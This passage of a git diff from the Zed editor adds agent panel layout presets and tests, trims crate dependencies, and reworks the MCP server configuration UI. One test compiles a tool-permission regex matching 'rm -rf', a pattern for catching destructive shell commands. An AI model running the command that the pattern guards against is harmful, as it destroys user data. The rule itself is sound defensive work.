settings.notification_panel.get_or_insert_default().button = + self.notification_panel_button; + } + } + + fn backfill_to(&self, user_layout: &PanelLayout, settings: &mut SettingsContent) { + if user_layout.agent_dock.is_none() { + settings.agent.get_or_insert_default().dock = self.agent_dock; + } + if user_layout.project_panel_dock.is_none() { + settings.project_panel.get_or_insert_default().dock = self.project_panel_dock; + } + if user_layout.outline_panel_dock.is_none() { + settings.outline_panel.get_or_insert_default().dock = self.outline_panel_dock; + } + if user_layout.collaboration_panel_dock.is_none() { + settings.collaboration_panel.get_or_insert_default().dock = + self.collaboration_panel_dock; + } + if user_layout.git_panel_dock.is_none() { + settings.git_panel.get_or_insert_default().dock = self.git_panel_dock; + } + if user_layout.notification_panel_button.is_none() { + settings.notification_panel.get_or_insert_default().button = + self.notification_panel_button; + } + } +} + +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum WindowLayout { + Editor(Option), + Agent(Option), + Custom(PanelLayout), +} + +impl WindowLayout { + pub fn agent() -> Self { + Self::Agent(None) + } + + pub fn editor() -> Self { + Self::Editor(None) + } +} + #[derive(Clone, Debug, RegisterSetting)] pub struct AgentSettings { pub enabled: bool, pub button: bool, pub dock: DockPosition, + pub flexible: bool, + pub sidebar_side: SidebarDockPosition, pub default_width: Pixels, pub default_height: Pixels, pub default_model: Option, @@ -36,21 +162,23 @@ pub struct AgentSettings { pub inline_alternatives: Vec, pub favorite_models: Vec, pub default_profile: AgentProfileId, - pub default_view: DefaultAgentView, pub profiles: IndexMap, pub notify_when_agent_waiting: NotifyWhenAgentWaiting, - pub play_sound_when_agent_done: bool, + pub play_sound_when_agent_done: PlaySoundWhenAgentDone, pub single_file_review: bool, pub model_parameters: Vec, pub enable_feedback: bool, pub expand_edit_card: 
bool, pub expand_terminal_card: bool, + pub thinking_display: ThinkingBlockDisplay, pub cancel_generation_on_terminal_stop: bool, pub use_modifier_to_send: bool, pub message_editor_min_lines: usize, pub show_turn_stats: bool, + pub show_merge_conflict_indicator: bool, pub tool_permissions: ToolPermissions, + pub new_thread_location: NewThreadLocation, } impl AgentSettings { @@ -76,6 +204,13 @@ impl AgentSettings { return None; } + pub fn sidebar_side(&self) -> SidebarSide { + match self.sidebar_side { + SidebarDockPosition::Left => SidebarSide::Left, + SidebarDockPosition::Right => SidebarSide::Right, + } + } + pub fn set_message_editor_max_lines(&self) -> usize { self.message_editor_min_lines * 2 } @@ -86,6 +221,62 @@ impl AgentSettings { .map(|sel| ModelId::new(format!("{}/{}", sel.provider.0, sel.model))) .collect() } + + pub fn get_layout(cx: &App) -> WindowLayout { + let store = cx.global::(); + let merged = store.merged_settings(); + let user_layout = store + .raw_user_settings() + .map(|u| PanelLayout::read_from(u.content.as_ref())) + .unwrap_or_default(); + let merged_layout = PanelLayout::read_from(merged); + + if merged_layout.is_agent_layout() { + return WindowLayout::Agent(Some(user_layout)); + } + + if merged_layout.is_editor_layout() { + return WindowLayout::Editor(Some(user_layout)); + } + + WindowLayout::Custom(user_layout) + } + + pub fn backfill_editor_layout(fs: Arc, cx: &App) { + let user_layout = cx + .global::() + .raw_user_settings() + .map(|u| PanelLayout::read_from(u.content.as_ref())) + .unwrap_or_default(); + + update_settings_file(fs, cx, move |settings, _cx| { + PanelLayout::EDITOR.backfill_to(&user_layout, settings); + }); + } + + pub fn set_layout(layout: WindowLayout, fs: Arc, cx: &App) { + let merged = PanelLayout::read_from(cx.global::().merged_settings()); + + match layout { + WindowLayout::Agent(None) => { + update_settings_file(fs, cx, move |settings, _cx| { + PanelLayout::AGENT.write_diff_to(&merged, settings); + }); + } + 
WindowLayout::Editor(None) => { + update_settings_file(fs, cx, move |settings, _cx| { + PanelLayout::EDITOR.write_diff_to(&merged, settings); + }); + } + WindowLayout::Agent(Some(saved)) + | WindowLayout::Editor(Some(saved)) + | WindowLayout::Custom(saved) => { + update_settings_file(fs, cx, move |settings, _cx| { + saved.write_to(settings); + }); + } + } + } } #[derive(Debug, PartialEq, Eq, Hash, Clone, Serialize, Deserialize, JsonSchema)] @@ -406,8 +597,10 @@ impl Settings for AgentSettings { enabled: agent.enabled.unwrap(), button: agent.button.unwrap(), dock: agent.dock.unwrap(), + sidebar_side: agent.sidebar_side.unwrap(), default_width: px(agent.default_width.unwrap()), default_height: px(agent.default_height.unwrap()), + flexible: agent.flexible.unwrap(), default_model: Some(agent.default_model.unwrap()), inline_assistant_model: agent.inline_assistant_model, inline_assistant_use_streaming_tools: agent @@ -418,7 +611,6 @@ impl Settings for AgentSettings { inline_alternatives: agent.inline_alternatives.unwrap_or_default(), favorite_models: agent.favorite_models, default_profile: AgentProfileId(agent.default_profile.unwrap()), - default_view: agent.default_view.unwrap(), profiles: agent .profiles .unwrap() @@ -427,17 +619,20 @@ impl Settings for AgentSettings { .collect(), notify_when_agent_waiting: agent.notify_when_agent_waiting.unwrap(), - play_sound_when_agent_done: agent.play_sound_when_agent_done.unwrap(), + play_sound_when_agent_done: agent.play_sound_when_agent_done.unwrap_or_default(), single_file_review: agent.single_file_review.unwrap(), model_parameters: agent.model_parameters, enable_feedback: agent.enable_feedback.unwrap(), expand_edit_card: agent.expand_edit_card.unwrap(), expand_terminal_card: agent.expand_terminal_card.unwrap(), + thinking_display: agent.thinking_display.unwrap(), cancel_generation_on_terminal_stop: agent.cancel_generation_on_terminal_stop.unwrap(), use_modifier_to_send: agent.use_modifier_to_send.unwrap(), 
message_editor_min_lines: agent.message_editor_min_lines.unwrap(), show_turn_stats: agent.show_turn_stats.unwrap(), + show_merge_conflict_indicator: agent.show_merge_conflict_indicator.unwrap(), tool_permissions: compile_tool_permissions(agent.tool_permissions), + new_thread_location: agent.new_thread_location.unwrap_or_default(), } } } @@ -539,10 +734,19 @@ fn compile_regex_rules( #[cfg(test)] mod tests { use super::*; + use gpui::{TestAppContext, UpdateGlobal}; use serde_json::json; use settings::ToolPermissionMode; use settings::ToolPermissionsContent; + fn set_agent_v2_defaults(cx: &mut gpui::App) { + SettingsStore::update_global(cx, |store, cx| { + store.update_default_settings(cx, |defaults| { + PanelLayout::AGENT.write_to(defaults); + }); + }); + } + #[test] fn test_compiled_regex_case_insensitive() { let regex = CompiledRegex::new("rm\\s+-rf", false).unwrap(); @@ -1015,4 +1219,282 @@ mod tests { let permissions = compile_tool_permissions(Some(content)); assert_eq!(permissions.default, ToolPermissionMode::Deny); } + + #[gpui::test] + fn test_get_layout(cx: &mut gpui::App) { + let store = SettingsStore::test(cx); + cx.set_global(store); + project::DisableAiSettings::register(cx); + AgentSettings::register(cx); + + // Test defaults are editor layout; switch to agent V2. + set_agent_v2_defaults(cx); + + // Should be Agent with an empty user layout (user hasn't customized). + let layout = AgentSettings::get_layout(cx); + let WindowLayout::Agent(Some(user_layout)) = layout else { + panic!("expected Agent(Some), got {:?}", layout); + }; + assert_eq!(user_layout, PanelLayout::default()); + + // User explicitly sets agent dock to left (matching the default). + // The merged result is still agent, but the user layout captures + // only what the user wrote. 
+ SettingsStore::update_global(cx, |store, cx| { + store + .set_user_settings(r#"{ "agent": { "dock": "left" } }"#, cx) + .unwrap(); + }); + + let layout = AgentSettings::get_layout(cx); + let WindowLayout::Agent(Some(user_layout)) = layout else { + panic!("expected Agent(Some), got {:?}", layout); + }; + assert_eq!(user_layout.agent_dock, Some(DockPosition::Left)); + assert_eq!(user_layout.project_panel_dock, None); + assert_eq!(user_layout.outline_panel_dock, None); + assert_eq!(user_layout.collaboration_panel_dock, None); + assert_eq!(user_layout.git_panel_dock, None); + assert_eq!(user_layout.notification_panel_button, None); + + // User sets a combination that doesn't match either preset: + // agent on the left but project panel also on the left. + SettingsStore::update_global(cx, |store, cx| { + store + .set_user_settings( + r#"{ + "agent": { "dock": "left" }, + "project_panel": { "dock": "left" } + }"#, + cx, + ) + .unwrap(); + }); + + let layout = AgentSettings::get_layout(cx); + let WindowLayout::Custom(user_layout) = layout else { + panic!("expected Custom, got {:?}", layout); + }; + assert_eq!(user_layout.agent_dock, Some(DockPosition::Left)); + assert_eq!(user_layout.project_panel_dock, Some(DockSide::Left)); + } + + #[gpui::test] + fn test_set_layout_round_trip(cx: &mut gpui::App) { + let store = SettingsStore::test(cx); + cx.set_global(store); + project::DisableAiSettings::register(cx); + AgentSettings::register(cx); + + // User has a custom layout: agent on the right with project panel + // also on the right. This doesn't match either preset. 
+ SettingsStore::update_global(cx, |store, cx| { + store + .set_user_settings( + r#"{ + "agent": { "dock": "right" }, + "project_panel": { "dock": "right" } + }"#, + cx, + ) + .unwrap(); + }); + + let original = AgentSettings::get_layout(cx); + let WindowLayout::Custom(ref original_user_layout) = original else { + panic!("expected Custom, got {:?}", original); + }; + assert_eq!(original_user_layout.agent_dock, Some(DockPosition::Right)); + assert_eq!( + original_user_layout.project_panel_dock, + Some(DockSide::Right) + ); + assert_eq!(original_user_layout.outline_panel_dock, None); + + // Switch to the agent layout. This overwrites the user settings. + SettingsStore::update_global(cx, |store, cx| { + store.update_user_settings(cx, |settings| { + PanelLayout::AGENT.write_to(settings); + }); + }); + + let layout = AgentSettings::get_layout(cx); + assert!(matches!(layout, WindowLayout::Agent(_))); + + // Restore the original custom layout. + SettingsStore::update_global(cx, |store, cx| { + store.update_user_settings(cx, |settings| { + original_user_layout.write_to(settings); + }); + }); + + // Should be back to the same custom layout. 
+ let restored = AgentSettings::get_layout(cx); + let WindowLayout::Custom(restored_user_layout) = restored else { + panic!("expected Custom, got {:?}", restored); + }; + assert_eq!(restored_user_layout.agent_dock, Some(DockPosition::Right)); + assert_eq!( + restored_user_layout.project_panel_dock, + Some(DockSide::Right) + ); + assert_eq!(restored_user_layout.outline_panel_dock, None); + } + + #[gpui::test] + async fn test_set_layout_minimal_diff(cx: &mut TestAppContext) { + let fs = fs::FakeFs::new(cx.background_executor.clone()); + fs.save( + paths::settings_file().as_path(), + &serde_json::json!({ + "agent": { "dock": "left" }, + "project_panel": { "dock": "left" } + }) + .to_string() + .into(), + Default::default(), + ) + .await + .unwrap(); + + cx.update(|cx| { + let store = SettingsStore::test(cx); + cx.set_global(store); + project::DisableAiSettings::register(cx); + AgentSettings::register(cx); + + // Apply the agent V2 defaults. + set_agent_v2_defaults(cx); + + // User has agent=left (matches preset) and project_panel=left (does not) + SettingsStore::update_global(cx, |store, cx| { + store + .set_user_settings( + r#"{ + "agent": { "dock": "left" }, + "project_panel": { "dock": "left" } + }"#, + cx, + ) + .unwrap(); + }); + + let layout = AgentSettings::get_layout(cx); + assert!(matches!(layout, WindowLayout::Custom(_))); + + AgentSettings::set_layout(WindowLayout::agent(), fs.clone(), cx); + }); + + cx.run_until_parked(); + + let written = fs.load(paths::settings_file().as_path()).await.unwrap(); + cx.update(|cx| { + SettingsStore::update_global(cx, |store, cx| { + store.set_user_settings(&written, cx).unwrap(); + }); + + // The user settings should still have agent=left (preserved) + // and now project_panel=right (changed to match preset). 
+ let store = cx.global::(); + let user_layout = store + .raw_user_settings() + .map(|u| PanelLayout::read_from(u.content.as_ref())) + .unwrap_or_default(); + + assert_eq!(user_layout.agent_dock, Some(DockPosition::Left)); + assert_eq!(user_layout.project_panel_dock, Some(DockSide::Right)); + // Other fields weren't in user settings and didn't need changing. + assert_eq!(user_layout.outline_panel_dock, None); + + // And the merged result should now match agent. + let layout = AgentSettings::get_layout(cx); + assert!(matches!(layout, WindowLayout::Agent(_))); + }); + } + + #[gpui::test] + async fn test_backfill_editor_layout(cx: &mut TestAppContext) { + let fs = fs::FakeFs::new(cx.background_executor.clone()); + // User has only customized project_panel to "right". + fs.save( + paths::settings_file().as_path(), + &serde_json::json!({ + "project_panel": { "dock": "right" } + }) + .to_string() + .into(), + Default::default(), + ) + .await + .unwrap(); + + cx.update(|cx| { + let store = SettingsStore::test(cx); + cx.set_global(store); + project::DisableAiSettings::register(cx); + AgentSettings::register(cx); + + // Simulate pre-migration state: editor defaults (the old world). + SettingsStore::update_global(cx, |store, cx| { + store.update_default_settings(cx, |defaults| { + PanelLayout::EDITOR.write_to(defaults); + }); + }); + + // User has only customized project_panel to "right". + SettingsStore::update_global(cx, |store, cx| { + store + .set_user_settings(r#"{ "project_panel": { "dock": "right" } }"#, cx) + .unwrap(); + }); + + // Run the one-time backfill while still on old defaults. + AgentSettings::backfill_editor_layout(fs.clone(), cx); + }); + + cx.run_until_parked(); + + // Read back the file and apply it, then switch to agent V2 defaults. 
+ let written = fs.load(paths::settings_file().as_path()).await.unwrap(); + cx.update(|cx| { + SettingsStore::update_global(cx, |store, cx| { + store.set_user_settings(&written, cx).unwrap(); + }); + + // The user's project_panel=right should be preserved (they set it). + // All other fields should now have the editor preset values + // written into user settings. + let store = cx.global::(); + let user_layout = store + .raw_user_settings() + .map(|u| PanelLayout::read_from(u.content.as_ref())) + .unwrap_or_default(); + + assert_eq!(user_layout.agent_dock, Some(DockPosition::Right)); + assert_eq!(user_layout.project_panel_dock, Some(DockSide::Right)); + assert_eq!(user_layout.outline_panel_dock, Some(DockSide::Left)); + assert_eq!( + user_layout.collaboration_panel_dock, + Some(DockPosition::Left) + ); + assert_eq!(user_layout.git_panel_dock, Some(DockPosition::Left)); + assert_eq!(user_layout.notification_panel_button, Some(true)); + + // Now switch defaults to agent V2. + set_agent_v2_defaults(cx); + + // Even though defaults are now agent, the backfilled user settings + // keep everything in the editor layout. The user's experience + // hasn't changed. 
+ let layout = AgentSettings::get_layout(cx); + let WindowLayout::Custom(user_layout) = layout else { + panic!( + "expected Custom (editor values override agent defaults), got {:?}", + layout + ); + }; + assert_eq!(user_layout.agent_dock, Some(DockPosition::Right)); + assert_eq!(user_layout.project_panel_dock, Some(DockSide::Right)); + }); + } } diff --git a/crates/agent_ui/Cargo.toml b/crates/agent_ui/Cargo.toml index 2a31781054fd29b30a3c8119e87491edbfb1e658..e505a124b6898953db9751ddfc8ab98cb7f496f0 100644 --- a/crates/agent_ui/Cargo.toml +++ b/crates/agent_ui/Cargo.toml @@ -14,7 +14,6 @@ doctest = false [features] test-support = [ - "assistant_text_thread/test-support", "acp_thread/test-support", "eval_utils", "gpui/test-support", @@ -23,6 +22,7 @@ test-support = [ "workspace/test-support", "agent/test-support", ] +audio = ["dep:audio"] unit-eval = [] [dependencies] @@ -34,17 +34,13 @@ agent_servers.workspace = true agent_settings.workspace = true ai_onboarding.workspace = true anyhow.workspace = true -arrayvec.workspace = true -assistant_text_thread.workspace = true -assistant_slash_command.workspace = true -assistant_slash_commands.workspace = true -audio.workspace = true +heapless.workspace = true +audio = { workspace = true, optional = true } base64.workspace = true buffer_diff.workspace = true chrono.workspace = true client.workspace = true cloud_api_types.workspace = true -cloud_llm_client.workspace = true collections.workspace = true command_palette_hooks.workspace = true component.workspace = true @@ -58,6 +54,7 @@ feature_flags.workspace = true file_icons.workspace = true fs.workspace = true futures.workspace = true +git.workspace = true fuzzy.workspace = true gpui.workspace = true gpui_tokio.workspace = true @@ -88,7 +85,6 @@ release_channel.workspace = true rope.workspace = true rules_library.workspace = true schemars.workspace = true -search.workspace = true serde.workspace = true serde_json.workspace = true serde_json_lenient.workspace = true @@ 
-101,6 +97,7 @@ terminal.workspace = true terminal_view.workspace = true text.workspace = true theme.workspace = true +theme_settings.workspace = true time.workspace = true time_format.workspace = true ui.workspace = true @@ -112,15 +109,13 @@ watch.workspace = true workspace.workspace = true zed_actions.workspace = true image.workspace = true -async-fs.workspace = true reqwest_client = { workspace = true, optional = true } [dev-dependencies] acp_thread = { workspace = true, features = ["test-support"] } agent = { workspace = true, features = ["test-support"] } -assistant_text_thread = { workspace = true, features = ["test-support"] } buffer_diff = { workspace = true, features = ["test-support"] } -clock.workspace = true + db = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } eval_utils.workspace = true @@ -131,11 +126,9 @@ languages = { workspace = true, features = ["test-support"] } language_model = { workspace = true, "features" = ["test-support"] } pretty_assertions.workspace = true project = { workspace = true, features = ["test-support"] } -recent_projects = { workspace = true, features = ["test-support"] } -remote_connection = { workspace = true, features = ["test-support"] } -title_bar = { workspace = true, features = ["test-support"] } + semver.workspace = true reqwest_client.workspace = true -tempfile.workspace = true + tree-sitter-md.workspace = true unindent.workspace = true diff --git a/crates/agent_ui/src/agent_configuration.rs b/crates/agent_ui/src/agent_configuration.rs index 9126d289c94563e99d9bda2212bda5259e9e4fa3..fda3cb9907b2f02cce29ff0ae8c4762e6efa625a 100644 --- a/crates/agent_ui/src/agent_configuration.rs +++ b/crates/agent_ui/src/agent_configuration.rs @@ -4,7 +4,7 @@ mod configure_context_server_tools_modal; mod manage_profiles_modal; mod tool_picker; -use std::{ops::Range, sync::Arc}; +use std::{ops::Range, rc::Rc, sync::Arc}; use agent::ContextServerRegistry; use anyhow::Result; 
@@ -28,14 +28,14 @@ use language_model::{ use language_models::AllLanguageModelSettings; use notifications::status_toast::{StatusToast, ToastIcon}; use project::{ - agent_server_store::{AgentServerStore, ExternalAgentServerName, ExternalAgentSource}, + agent_server_store::{AgentId, AgentServerStore, ExternalAgentSource}, context_server_store::{ContextServerConfiguration, ContextServerStatus, ContextServerStore}, }; use settings::{Settings, SettingsStore, update_settings_file}; use ui::{ - ButtonStyle, Chip, CommonAnimationExt, ContextMenu, ContextMenuEntry, Disclosure, Divider, - DividerColor, ElevationIndex, Indicator, LabelSize, PopoverMenu, Switch, Tooltip, - WithScrollbar, prelude::*, + AiSettingItem, AiSettingItemSource, AiSettingItemStatus, ButtonStyle, Chip, ContextMenu, + ContextMenuEntry, Disclosure, Divider, DividerColor, ElevationIndex, LabelSize, PopoverMenu, + Switch, Tooltip, WithScrollbar, prelude::*, }; use util::ResultExt as _; use workspace::{Workspace, create_and_open_local_file}; @@ -45,29 +45,32 @@ pub(crate) use configure_context_server_modal::ConfigureContextServerModal; pub(crate) use configure_context_server_tools_modal::ConfigureContextServerToolsModal; pub(crate) use manage_profiles_modal::ManageProfilesModal; -use crate::agent_configuration::add_llm_provider_modal::{ - AddLlmProviderModal, LlmCompatibleProvider, +use crate::{ + Agent, + agent_configuration::add_llm_provider_modal::{AddLlmProviderModal, LlmCompatibleProvider}, + agent_connection_store::{AgentConnectionStatus, AgentConnectionStore}, }; pub struct AgentConfiguration { fs: Arc, language_registry: Arc, agent_server_store: Entity, + agent_connection_store: Entity, workspace: WeakEntity, focus_handle: FocusHandle, configuration_views_by_provider: HashMap, context_server_store: Entity, expanded_provider_configurations: HashMap, context_server_registry: Entity, - _registry_subscription: Subscription, + _subscriptions: Vec, scroll_handle: ScrollHandle, - _check_for_gemini: 
Task<()>, } impl AgentConfiguration { pub fn new( fs: Arc, agent_server_store: Entity, + agent_connection_store: Entity, context_server_store: Entity, context_server_registry: Entity, language_registry: Arc, @@ -77,25 +80,27 @@ impl AgentConfiguration { ) -> Self { let focus_handle = cx.focus_handle(); - let registry_subscription = cx.subscribe_in( - &LanguageModelRegistry::global(cx), - window, - |this, _, event: &language_model::Event, window, cx| match event { - language_model::Event::AddedProvider(provider_id) => { - let provider = LanguageModelRegistry::read_global(cx).provider(provider_id); - if let Some(provider) = provider { - this.add_provider_configuration_view(&provider, window, cx); + let subscriptions = vec![ + cx.subscribe_in( + &LanguageModelRegistry::global(cx), + window, + |this, _, event: &language_model::Event, window, cx| match event { + language_model::Event::AddedProvider(provider_id) => { + let provider = LanguageModelRegistry::read_global(cx).provider(provider_id); + if let Some(provider) = provider { + this.add_provider_configuration_view(&provider, window, cx); + } } - } - language_model::Event::RemovedProvider(provider_id) => { - this.remove_provider_configuration_view(provider_id); - } - _ => {} - }, - ); - - cx.subscribe(&context_server_store, |_, _, _, cx| cx.notify()) - .detach(); + language_model::Event::RemovedProvider(provider_id) => { + this.remove_provider_configuration_view(provider_id); + } + _ => {} + }, + ), + cx.subscribe(&agent_server_store, |_, _, _, cx| cx.notify()), + cx.observe(&agent_connection_store, |_, _, cx| cx.notify()), + cx.subscribe(&context_server_store, |_, _, _, cx| cx.notify()), + ]; let mut this = Self { fs, @@ -104,13 +109,14 @@ impl AgentConfiguration { focus_handle, configuration_views_by_provider: HashMap::default(), agent_server_store, + agent_connection_store, context_server_store, expanded_provider_configurations: HashMap::default(), context_server_registry, - _registry_subscription: 
registry_subscription, + _subscriptions: subscriptions, scroll_handle: ScrollHandle::new(), - _check_for_gemini: Task::ready(()), }; + this.build_provider_configuration_views(window, cx); this } @@ -228,6 +234,7 @@ impl AgentConfiguration { .unwrap_or(false); v_flex() + .min_w_0() .w_full() .when(is_expanded, |this| this.mb_2()) .child( @@ -312,6 +319,7 @@ impl AgentConfiguration { ) .child( v_flex() + .min_w_0() .w_full() .px_2() .gap_1() @@ -330,10 +338,11 @@ impl AgentConfiguration { .full_width() .style(ButtonStyle::Outlined) .layer(ElevationIndex::ModalSurface) - .icon_position(IconPosition::Start) - .icon(IconName::Thread) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Thread) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .on_click(cx.listener({ let provider = provider.clone(); @@ -355,10 +364,11 @@ impl AgentConfiguration { ) .full_width() .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Trash) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Trash) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .on_click(cx.listener({ let provider = provider.clone(); @@ -424,10 +434,11 @@ impl AgentConfiguration { .trigger( Button::new("add-provider", "Add Provider") .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Plus) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small), ) .menu({ @@ -459,6 +470,7 @@ impl AgentConfiguration { }); v_flex() + .min_w_0() .w_full() .child(self.render_section_title( "LLM Providers", @@ -498,6 +510,7 @@ impl AgentConfiguration { Plan::ZedFree => ("Free", Color::Default, free_chip_bg), Plan::ZedProTrial => ("Pro Trial", Color::Accent, pro_chip_bg), Plan::ZedPro => ("Pro", 
Color::Accent, pro_chip_bg), + Plan::ZedBusiness => ("Business", Color::Accent, pro_chip_bg), Plan::ZedStudent => ("Student", Color::Accent, pro_chip_bg), }; @@ -510,21 +523,18 @@ impl AgentConfiguration { } } - fn render_context_servers_section( - &mut self, - window: &mut Window, - cx: &mut Context, - ) -> impl IntoElement { + fn render_context_servers_section(&mut self, cx: &mut Context) -> impl IntoElement { let context_server_ids = self.context_server_store.read(cx).server_ids(); let add_server_popover = PopoverMenu::new("add-server-popover") .trigger( Button::new("add-server", "Add Server") .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Plus) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small), ) .menu({ @@ -559,6 +569,7 @@ impl AgentConfiguration { }); v_flex() + .min_w_0() .border_b_1() .border_color(cx.theme().colors().border) .child(self.render_section_title( @@ -592,7 +603,7 @@ impl AgentConfiguration { } else { parent.children(itertools::intersperse_with( context_server_ids.iter().cloned().map(|context_server_id| { - self.render_context_server(context_server_id, window, cx) + self.render_context_server(context_server_id, cx) .into_any_element() }), || { @@ -609,7 +620,6 @@ impl AgentConfiguration { fn render_context_server( &self, context_server_id: ContextServerId, - window: &mut Window, cx: &Context, ) -> impl use<> + IntoElement { let server_status = self @@ -632,11 +642,30 @@ impl AgentConfiguration { ) }); + let display_name = if provided_by_extension { + resolve_extension_for_context_server(&context_server_id, cx) + .map(|(_, manifest)| { + let name = manifest.name.as_str(); + let stripped = name + .strip_suffix(" MCP Server") + .or_else(|| name.strip_suffix(" MCP")) + .or_else(|| name.strip_suffix(" Context Server")) + .unwrap_or(name); + SharedString::from(stripped.to_string()) 
+ }) + .unwrap_or_else(|| item_id.clone()) + } else { + item_id.clone() + }; + let error = if let ContextServerStatus::Error(error) = server_status.clone() { Some(error) } else { None }; + let auth_required = matches!(server_status, ContextServerStatus::AuthRequired); + let authenticating = matches!(server_status, ContextServerStatus::Authenticating); + let context_server_store = self.context_server_store.clone(); let tool_count = self .context_server_registry @@ -644,47 +673,31 @@ impl AgentConfiguration { .tools_for_server(&context_server_id) .count(); - let (source_icon, source_tooltip) = if provided_by_extension { - ( - IconName::ZedSrcExtension, - "This MCP server was installed from an extension.", - ) + let source = if provided_by_extension { + AiSettingItemSource::Extension } else { - ( - IconName::ZedSrcCustom, - "This custom MCP server was installed directly.", - ) + AiSettingItemSource::Custom }; - let (status_indicator, tooltip_text) = match server_status { - ContextServerStatus::Starting => ( - Icon::new(IconName::LoadCircle) - .size(IconSize::XSmall) - .color(Color::Accent) - .with_keyed_rotate_animation( - SharedString::from(format!("{}-starting", context_server_id.0)), - 3, - ) - .into_any_element(), - "Server is starting.", - ), - ContextServerStatus::Running => ( - Indicator::dot().color(Color::Success).into_any_element(), - "Server is active.", - ), - ContextServerStatus::Error(_) => ( - Indicator::dot().color(Color::Error).into_any_element(), - "Server has an error.", - ), - ContextServerStatus::Stopped => ( - Indicator::dot().color(Color::Muted).into_any_element(), - "Server is stopped.", - ), + let status = match server_status { + ContextServerStatus::Starting => AiSettingItemStatus::Starting, + ContextServerStatus::Running => AiSettingItemStatus::Running, + ContextServerStatus::Error(_) => AiSettingItemStatus::Error, + ContextServerStatus::Stopped => AiSettingItemStatus::Stopped, + ContextServerStatus::AuthRequired => 
AiSettingItemStatus::AuthRequired, + ContextServerStatus::Authenticating => AiSettingItemStatus::Authenticating, }; + let is_remote = server_configuration .as_ref() .map(|config| matches!(config.as_ref(), ContextServerConfiguration::Http { .. })) .unwrap_or(false); + + let should_show_logout_button = server_configuration.as_ref().is_some_and(|config| { + matches!(config.as_ref(), ContextServerConfiguration::Http { .. }) + && !config.has_static_auth_header() + }); + let context_server_configuration_menu = PopoverMenu::new("context-server-config-menu") .trigger_with_tooltip( IconButton::new("context-server-config-menu", IconName::Settings) @@ -699,6 +712,7 @@ impl AgentConfiguration { let language_registry = self.language_registry.clone(); let workspace = self.workspace.clone(); let context_server_registry = self.context_server_registry.clone(); + let context_server_store = context_server_store.clone(); move |window, cx| { Some(ContextMenu::build(window, cx, |menu, _window, _cx| { @@ -745,6 +759,17 @@ impl AgentConfiguration { .ok(); } })) + .when(should_show_logout_button, |this| { + this.entry("Log Out", None, { + let context_server_store = context_server_store.clone(); + let context_server_id = context_server_id.clone(); + move |_window, cx| { + context_server_store.update(cx, |store, cx| { + store.logout_server(&context_server_id, cx).log_err(); + }); + } + }) + }) .separator() .entry("Uninstall", None, { let fs = fs.clone(); @@ -801,147 +826,168 @@ impl AgentConfiguration { } }); - v_flex() - .id(item_id.clone()) - .child( - h_flex() - .justify_between() + let feedback_base_container = + || h_flex().py_1().min_w_0().w_full().gap_1().justify_between(); + + let details: Option = if let Some(error) = error { + Some( + feedback_base_container() .child( h_flex() - .flex_1() + .pr_4() .min_w_0() + .w_full() + .gap_2() .child( - h_flex() - .id(format!("tooltip-{}", item_id)) - .h_full() - .w_3() - .mr_2() - .justify_center() - .tooltip(Tooltip::text(tooltip_text)) - 
.child(status_indicator), - ) - .child(Label::new(item_id).truncate()) - .child( - div() - .id("extension-source") - .mt_0p5() - .mx_1() - .flex_none() - .tooltip(Tooltip::text(source_tooltip)) - .child( - Icon::new(source_icon) - .size(IconSize::Small) - .color(Color::Muted), - ), + Icon::new(IconName::XCircle) + .size(IconSize::XSmall) + .color(Color::Error), ) - .when(is_running, |this| { - this.child( - Label::new(if tool_count == 1 { - SharedString::from("1 tool") - } else { - SharedString::from(format!("{} tools", tool_count)) - }) - .color(Color::Muted) - .size(LabelSize::Small), - ) - }), + .child(div().min_w_0().flex_1().child( + Label::new(error).color(Color::Muted).size(LabelSize::Small), + )), ) - .child( - h_flex() - .gap_0p5() - .flex_none() - .child(context_server_configuration_menu) - .child( - Switch::new("context-server-switch", is_running.into()) + .when(should_show_logout_button, |this| { + this.child( + Button::new("error-logout-server", "Log Out") + .style(ButtonStyle::Outlined) + .label_size(LabelSize::Small) .on_click({ - let context_server_manager = self.context_server_store.clone(); - let fs = self.fs.clone(); - - move |state, _window, cx| { - let is_enabled = match state { - ToggleState::Unselected - | ToggleState::Indeterminate => { - context_server_manager.update(cx, |this, cx| { - this.stop_server(&context_server_id, cx) - .log_err(); - }); - false - } - ToggleState::Selected => { - context_server_manager.update(cx, |this, cx| { - if let Some(server) = - this.get_server(&context_server_id) - { - this.start_server(server, cx); - } - }); - true - } - }; - update_settings_file(fs.clone(), cx, { - let context_server_id = context_server_id.clone(); - - move |settings, _| { - settings - .project - .context_servers - .entry(context_server_id.0) - .or_insert_with(|| { - settings::ContextServerSettingsContent::Extension { - enabled: is_enabled, - remote: false, - settings: serde_json::json!({}), - } - }) - .set_enabled(is_enabled); - } + let 
